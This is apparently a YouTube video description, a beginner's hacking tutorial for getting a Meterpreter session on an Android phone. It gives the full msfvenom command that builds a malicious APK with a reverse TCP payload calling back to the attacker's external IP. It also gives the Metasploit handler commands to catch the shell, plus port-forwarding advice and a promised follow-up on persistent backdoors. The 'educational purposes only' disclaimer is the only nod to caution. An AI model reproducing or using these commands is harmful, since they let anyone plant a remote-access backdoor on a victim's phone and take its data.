Hacking Android Phone - Getting meterpreter session for android - Hacking For beginner(2016)

Hacking Android Phone - Getting meterpreter session for android - Hacking For beginner(2016)

 

 

*PLEASE ENABLE ANNOTATIONS ON THIS VIDEO*

Hey, fellow novice hackers!
In this video, you''ll go step-by-step on successfully attaining a meterpreter session on android.

*THIS VIDEO IS FOR EDUCATIONAL PURPOSES ONLY*
*INSTALL KALI LINUX 2.0, IF YOU HAVE NOT ALREADY*

Install Kali Linux 2.0 in Virtual Box guide: http://goo.gl/cjYANF

Requirements :
- Kali linux 2.0 OS
- Android device running 4.4 or later version of android. For some reason, I don't know, the metasploit apk will not install on earlier versions of android.
-Learn how to port forward : http://portforward.com/

Commands in terminal :
>>msfvenom -p android/meterpreter/reverse_tcp lhost=external IP lport=4444 or 443 R > /root/whatever.apk
>>msfconsole
>>use exploit/multi/handler
>>set payload android/meterpreter/reverse_tcp
>>set lhost *ip of linux*
>>set lport *same port assigned above*
>>exploit
meterpreter > help to get list of all commands

-Please wait for next video, in which I'll show how to get a persistent backdoor.
-And yes, whatsapp messages can't be dumped.

Drop a comment if you are facing any issues. I'll answer them in a promptly manner. Like, share and subscribe if it worked just fine. :D

*Please don't mind bad quality of video whilst recording android device, It's understandable though*
 

 

https://www.youtube.com/watch?v=O1E-YdeXp1Q


vishal here